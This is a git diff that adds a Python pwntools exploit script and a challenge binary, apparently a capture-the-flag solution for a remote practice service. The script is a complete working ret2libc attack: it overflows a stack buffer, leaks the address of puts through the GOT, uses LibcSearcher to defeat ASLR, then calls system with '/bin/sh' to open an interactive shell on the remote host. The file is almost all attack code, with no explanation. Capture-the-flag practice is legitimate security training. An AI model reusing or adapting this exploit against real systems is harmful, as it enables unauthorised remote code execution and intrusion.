diff --git a/stackoverflow/ASLR/answer.py b/stackoverflow/ASLR/answer.py
new file mode 100644
index 0000000..599363b
--- /dev/null
+++ b/stackoverflow/ASLR/answer.py
@@ -0,0 +1,30 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+import os
+context.log_level = "debug"
+context(arch = "i386",os = "linux")
+
+p = remote("hackme.inndy.tw", 7702)
+#p = process('./toooomuch')
+elf = ELF('./toooomuch')
+p.recvuntil("Give me your passcode: ")
+
+puts_plt = elf.plt['puts']
+puts_got = elf.got['puts']
+toooomuch_func = elf.sym['toooomuch']
+payload = 0x18*'z'+p32(0)+p32(puts_plt)+p32(toooomuch_func)+p32(puts_got)
+p.sendline(payload)
+p.recvuntil("You are not allowed here!\n")
+puts_libc = u32(p.recv(4))
+
+libc = LibcSearcher('puts', puts_libc)
+libc_base = puts_libc - libc.dump('puts')
+system_libc = libc_base + libc.dump('system')
+binsh_libc = libc_base + libc.dump('str_bin_sh')
+p.recvuntil("Give me your passcode: ")
+
+payload = 0x18*'z'+p32(0)+p32(system_libc)+p32(toooomuch_func)+p32(binsh_libc)
+p.sendline(payload)
+
+p.interactive()
diff --git a/stackoverflow/ASLR/toooomuch b/stackoverflow/ASLR/toooomuch
new file mode 100755
index 0000000..7117e6d
Binary files /dev/null and b/stackoverflow/ASLR/toooomuch differ